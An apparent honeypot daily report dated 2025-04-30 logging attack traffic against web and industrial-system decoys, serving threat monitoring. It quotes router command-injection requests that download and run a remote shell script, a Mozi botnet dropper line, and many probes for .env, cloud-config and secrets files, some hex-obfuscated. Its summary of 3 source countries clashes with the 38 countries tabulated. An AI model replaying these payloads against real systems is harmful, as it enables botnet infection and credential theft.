Daily Report: 2025-04-30#
Executive summary#
interaction report on http service of various Hhoneypot around the world.
- Executive summary
- OT report simplified
- Botnet dropper behaviour
- List of request
- List of country_iso_code
executive_summary#
In today’s repport, we detected 3 stage 1 IP address(es), linked to 3 dropper URL(s).
There are 81 new requests that have never been observed before (these were added to the monitored request database.).
A total of 1752 requests were recorded during the day, originating from 3 different countries, with a peak of 388 requests coming from NL.
ot_simplified_report#
simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.
source_country | targeted_country |
---|---|
FR | Singapore |
US | Singapore |
CN | Dubai |
US | Dubai |
botnet_dropper_behaviour#
remote_addr | request |
---|---|
45.95.147.209 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+sh%3B+wget+http%3A%2F%2F176.65.148.234%2Fsh%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh%60) HTTP/1.1 |
124.131.139.150 | 27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0 |
141.98.11.128 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F176.65.148.234%2Fsh%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh%60) HTTP/1.1 |
request#
The list of requests presented here are those that have not yet been yet integrated into the request database.
number_of_occurence | request | |
---|---|---|
7 | 14 | \x04\x01\x01\xBB\x8E,\xD7\xA1\x00 |
8 | 11 | \x05\x01\x02 |
9 | 10 | CONNECT myip.wtf:443 HTTP/1.1 |
17 | 6 | GET /api/v1/ws/server HTTP/1.1 |
91 | 4 | GET http://ipv4.icanhazip.com/ HTTP/1.1 |
168 | 2 | GET /.env.env HTTP/1.1 |
170 | 2 | GET /env.xml HTTP/1.1 |
171 | 2 | GET /.env.xml HTTP/1.1 |
185 | 2 | GET /Awsconfig.json HTTP/1.1 |
191 | 2 | GET /?format=json HTTP/1.1 |
194 | 2 | GET /PHPInfo.php HTTP/1.1 |
195 | 2 | GET /PhpInfo.php HTTP/1.1 |
196 | 2 | GET /01-info.php HTTP/1.1 |
197 | 2 | GET /info_php.php HTTP/1.1 |
198 | 2 | GET /0info.php HTTP/1.1 |
199 | 2 | GET /0-info.php HTTP/1.1 |
200 | 2 | GET /0_info.php HTTP/1.1 |
205 | 2 | GET /user_secrets.yml HTTP/1.1 |
206 | 2 | GET /app/env/.env HTTP/1.1 |
207 | 2 | GET /.env.html HTTP/1.1 |
208 | 2 | GET /.env.list HTTP/1.1 |
213 | 1 | GET /%61%70%69/%65%6e%37%36 HTTP/1.1 |
217 | 1 | GET /%65%6e%76 HTTP/1.1 |
247 | 1 | GET /EcnG HTTP/1.1 |
248 | 1 | GET /PSCv HTTP/1.1 |
251 | 1 | GET /%67%61%74%65%77%61%79/%65%6e%76 HTTP/1.1 |
253 | 1 | GET /q1Ri HTTP/1.1 |
257 | 1 | GET /%6d%61%6e%61%67%65%6d%65%6e%74/%65%6e%76 HTTP/1.1 |
258 | 1 | GET /%6d%61%6e%61%67%65%6d%65%6e%74/%61%63%74%75%61%74%6f%72/%65%6e%76 HTTP/1.1 |
259 | 1 | GET /%6d%61%6e%61%67%65/%65%6e%76 HTTP/1.1 |
260 | 1 | GET /%6d%61%6e%61%67%65/%61%63%74%75%61%74%6f%72/%65%6e%76 HTTP/1.1 |
261 | 1 | GET /%67%61%74%65%77%61%79/%61%63%74%75%61%74%6f%72/%65%6e%76 HTTP/1.1 |
262 | 1 | GET /%61%63%74%75%61%74%6f%72/%65%6e%76 HTTP/1.1 |
263 | 1 | GET /%61%70%69/%61%63%74%75%61%74%6f%72/%65%6e%37%36 HTTP/1.1 |
265 | 1 | GET /Kz4c HTTP/1.1 |
272 | 1 | \x04\x01\x01\xBB@\xE9\xA3j\x00 |
273 | 1 | GET /temp.env HTTP/1.1 |
274 | 1 | GET /tmp.env HTTP/1.1 |
277 | 1 | GET /security.txt HTTP/1.1 |
278 | 1 | GET /security.yml HTTP/1.1 |
279 | 1 | GET /settings.yml HTTP/1.1 |
282 | 1 | GET /test.env HTTP/1.1 |
285 | 1 | GET /twilio.xml HTTP/1.1 |
286 | 1 | GET /twilio HTTP/1.1 |
287 | 1 | GET /.twilio HTTP/1.1 |
288 | 1 | GET /.twilio.env HTTP/1.1 |
289 | 1 | GET /twilio.txt HTTP/1.1 |
293 | 1 | GET /twilio.yml HTTP/1.1 |
294 | 1 | GET /twilio.php HTTP/1.1 |
295 | 1 | GET /twilio.js HTTP/1.1 |
296 | 1 | GET /twilio.json HTTP/1.1 |
302 | 1 | GET /._env HTTP/1.1 |
303 | 1 | GET /_.env HTTP/1.1 |
304 | 1 | GET /config/frontend_dev.php HTTP/1.1 |
306 | 1 | GET /robots.txt/ HTTP/1.1 |
308 | 1 | GET /api;/actuator;/en%76; HTTP/1.1 |
309 | 1 | GET /57.129;/env; HTTP/1.1 |
310 | 1 | GET /57.129;/actuator;/env; HTTP/1.1 |
311 | 1 | GET /en%76; HTTP/1.1 |
312 | 1 | GET /actuator;/en%76; HTTP/1.1 |
313 | 1 | GET /api;/en%76; HTTP/1.1 |
322 | 1 | GET /admin/config.php HTTP/1.0 |
327 | 1 | GET /%61%70%69/%61%63%74%75%61%74%6f%72/%65%6e%76 HTTP/1.1 |
328 | 1 | GET /%61%70%69/%69%6e%74%65%72%6e%61%6c/%61%63%74%75%61%74%6f%72/%65%6e%76 HTTP/1.1 |
329 | 1 | GET /%61%70%69/%65%6e%76 HTTP/1.1 |
330 | 1 | GET /61;/env; HTTP/1.1 |
331 | 1 | GET /61;/actuator;/env; HTTP/1.1 |
332 | 1 | GET /manage;/actuator;/env; HTTP/1.1 |
333 | 1 | GET /manage;/env; HTTP/1.1 |
334 | 1 | GET /management;/actuator;/env; HTTP/1.1 |
335 | 1 | GET /management;/env; HTTP/1.1 |
336 | 1 | GET /management/env HTTP/1.1 |
355 | 1 | \x00\x04\x08*\x10\x00 |
356 | 1 | \x00\x0E\x08\xA3\xEF\xCD\xC5EK:\xC4\x00\x00\x00\x00\x00 |
357 | 1 | \x00\x0E8\xA3\xEF\xCD\xC5EK:\xC4\x00\x00\x00\x00\x00 |
379 | 1 | GET /actuator;/env; HTTP/1.1 |
385 | 1 | GET /api;/internal;/actuator;/env; HTTP/1.1 |
386 | 1 | GET /api;/env; HTTP/1.1 |
389 | 1 | GET /api;/actuator;/env; HTTP/1.1 |
391 | 1 | GET /gateway;/env; HTTP/1.1 |
392 | 1 | GET /gateway;/actuator;/env; HTTP/1.1 |
country_iso_code#
number_of_occurence | country_iso_code | |
---|---|---|
0 | 388 | NL |
1 | 330 | US |
2 | 283 | GB |
3 | 184 | SC |
4 | 100 | CN |
5 | 68 | HK |
6 | 51 | IN |
7 | 45 | IS |
8 | 41 | PL |
9 | 39 | SG |
10 | 37 | DE |
11 | 30 | FR |
12 | 14 | AO |
13 | 14 | UA |
14 | 14 | CA |
15 | 13 | PT |
16 | 12 | KR |
17 | 10 | HR |
18 | 8 | TH |
19 | 6 | JP |
20 | 6 | FI |
21 | 6 | KW |
22 | 6 | LA |
23 | 6 | TR |
24 | 5 | GH |
25 | 5 | BE |
26 | 4 | VE |
27 | 4 | IT |
28 | 4 | RU |
29 | 4 | VN |
30 | 3 | BR |
31 | 2 | AL |
32 | 2 | ES |
33 | 2 | MC |
34 | 2 | SA |
35 | 1 | CO |
36 | 1 | BG |
37 | 1 | LT |
38 | 1 | ID |